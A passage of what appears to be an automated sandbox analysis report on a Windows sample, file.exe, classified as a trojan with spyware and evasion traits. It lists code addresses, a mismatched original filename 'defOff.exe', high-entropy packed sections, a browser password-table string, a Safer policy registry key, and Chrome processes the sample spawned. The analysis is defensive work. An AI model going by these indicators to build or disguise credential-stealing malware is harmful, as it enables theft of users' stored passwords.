Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C1B883 0_2_05C1B883
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BE48F8 0_2_05BE48F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD88F2 0_2_05BD88F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C0008F 0_2_05C0008F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BE28E2 0_2_05BE28E2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C0709E 0_2_05C0709E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BDF0DD 0_2_05BDF0DD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C0B8A6 0_2_05C0B8A6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C2A0AA 0_2_05C2A0AA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C0F0BB 0_2_05C0F0BB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C110BD 0_2_05C110BD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BDE033 0_2_05BDE033
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C25852 0_2_05C25852
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD981B 0_2_05BD981B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BEA00E 0_2_05BEA00E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BDC80F 0_2_05BDC80F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BDD80F 0_2_05BDD80F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BF580C 0_2_05BF580C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BDF802 0_2_05BDF802
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BFC87D 0_2_05BFC87D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C0C806 0_2_05C0C806
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C27005 0_2_05C27005
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BF5065 0_2_05BF5065
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C3181E 0_2_05C3181E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C2083B 0_2_05C2083B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C0A3C6 0_2_05C0A3C6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C03BCA 0_2_05C03BCA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C2ABCC 0_2_05C2ABCC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C31BD5 0_2_05C31BD5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BEA3A7 0_2_05BEA3A7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C2B3E5 0_2_05C2B3E5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C30BEB 0_2_05C30BEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD9389 0_2_05BD9389
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BEAB86 0_2_05BEAB86
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C073F8 0_2_05C073F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C0CBF9 0_2_05C0CBF9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C1C3FE 0_2_05C1C3FE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BE73FF 0_2_05BE73FF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C12B86 0_2_05C12B86
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BDDBD5 0_2_05BDDBD5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C2C3AB 0_2_05C2C3AB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C053AB 0_2_05C053AB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C023B8 0_2_05C023B8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C1DBB8 0_2_05C1DBB8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BDCB33 0_2_05BDCB33
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C04B50 0_2_05C04B50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C21B5E 0_2_05C21B5E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C09B66 0_2_05C09B66
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C0BB6D 0_2_05C0BB6D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C3136C 0_2_05C3136C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C27373 0_2_05C27373
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C1731B 0_2_05C1731B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BF5363 0_2_05BF5363
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C2D32F 0_2_05C2D32F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD9B49 0_2_05BD9B49
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BDC34A 0_2_05BDC34A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BF1B46 0_2_05BF1B46
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BE02F9 0_2_05BE02F9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BFEAF6 0_2_05BFEAF6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C30295 0_2_05C30295
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BF8AE3 0_2_05BF8AE3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BFF2DF 0_2_05BFF2DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C2F2A3 0_2_05C2F2A3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BE8AD8 0_2_05BE8AD8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C0DAAB 0_2_05C0DAAB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BE22CF 0_2_05BE22CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BF92C7 0_2_05BF92C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C02ABA 0_2_05C02ABA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C1F24D 0_2_05C1F24D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C2DA4C 0_2_05C2DA4C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C26259 0_2_05C26259
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C0625D 0_2_05C0625D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BDB20F 0_2_05BDB20F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BFE205 0_2_05BFE205
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C2327D 0_2_05C2327D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BDD27D 0_2_05BDD27D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BFBA79 0_2_05BFBA79
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C1A20C 0_2_05C1A20C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C2CA0D 0_2_05C2CA0D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD7267 0_2_05BD7267
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C0D226 0_2_05C0D226
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD8A5A 0_2_05BD8A5A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BE5A49 0_2_05BE5A49
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05C0B23C 0_2_05C0B23C
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000003.2372140774.000000000547C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2374686161.0000000005816000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2381552909.0000000005936000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2382305479.0000000005820000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2371910968.0000000005612000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2376175010.000000000581D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2373939216.00000000058CF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2382687425.0000000005944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2380340374.0000000005A41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2406353020.000000000542C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2380115092.000000000581C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2372830510.00000000058BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2383177674.000000000581A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2381963487.0000000005818000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2374207420.0000000005812000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2372290856.00000000058AB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2379066800.0000000005818000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2383051149.0000000005A79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2379261643.0000000005819000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2386487887.0000000005814000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2381829733.0000000005935000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2379568855.0000000005921000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2372999258.0000000005818000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2372666137.00000000058B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2376340042.000000000581C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2374939933.0000000005815000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2372431363.0000000005820000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2381672432.0000000005817000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2375918451.00000000058E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2378385867.0000000005815000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2377660522.0000000005904000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2406444853.0000000005387000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2375101094.0000000005819000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2376087393.00000000058E2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2382188885.0000000005A5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2384237391.0000000005961000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2374501212.00000000058C3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2374296784.00000000058C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2377942095.0000000005821000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2381317388.000000000593B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2382931794.0000000005948000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2374858570.0000000005985000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2372915827.000000000596D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2376255222.00000000058E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2372365506.0000000005950000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2374585097.000000000597A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2385999244.000000000595F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2406444853.0000000005372000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2375185260.00000000058DB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2380571908.000000000592A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2378573052.0000000005817000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000002.2513671808.0000000005BC6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2375019548.00000000058D7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2379948321.0000000005A31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2378086577.000000000590B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2383557356.0000000005957000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2376432800.00000000058EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2375362219.000000000581D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2376518987.00000000059D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2375998711.000000000581E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2376703670.00000000058FE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2383432763.0000000005818000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2379456238.0000000005815000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2374043748.0000000005816000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2374394692.0000000005814000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2376801850.0000000005813000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2372743378.000000000581A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2376607560.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2377196928.00000000059E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2372510283.0000000005472000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2406382882.00000000053A0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2376927546.00000000058F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2382558105.0000000005813000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2380986729.000000000592C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2372067558.0000000005816000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2372588477.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2378292143.000000000590D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2386231962.0000000005AA6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2378667865.0000000005906000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2381107217.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2385082515.0000000005812000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2406501957.000000000085A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2380772072.0000000005815000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2383740279.0000000005813000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2374772423.00000000058CE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2382079520.0000000005933000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2377003197.0000000005813000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2372216307.0000000005813000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2380225922.0000000005930000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2377558378.000000000581F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2378191558.0000000005818000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2378762507.0000000005814000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2382425964.0000000005944000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2374119619.00000000058CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2379166432.0000000005920000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2378958898.0000000005A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2381438320.0000000005812000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2378856160.000000000590C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2375279985.00000000059AB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2379355861.0000000005913000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2380462145.0000000005815000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000002.2513282897.0000000005819000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2383310564.000000000595E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2382807386.0000000005813000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2371987142.0000000005473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2381226540.0000000005816000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2377098140.00000000058F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2378478283.0000000005908000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9975065104166667
Source: file.exe Static PE information: Section: bioduybg ZLIB complexity 0.9947613765105741
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@24/61@7/6
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000003.2163716231.00000000053A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2164036579.000000000538D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2188088407.000000000539E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1884,i,17699298288420818842,9296858339139321116,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 --field-trial-handle=1848,i,12859633962272970777,3292351338685912697,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
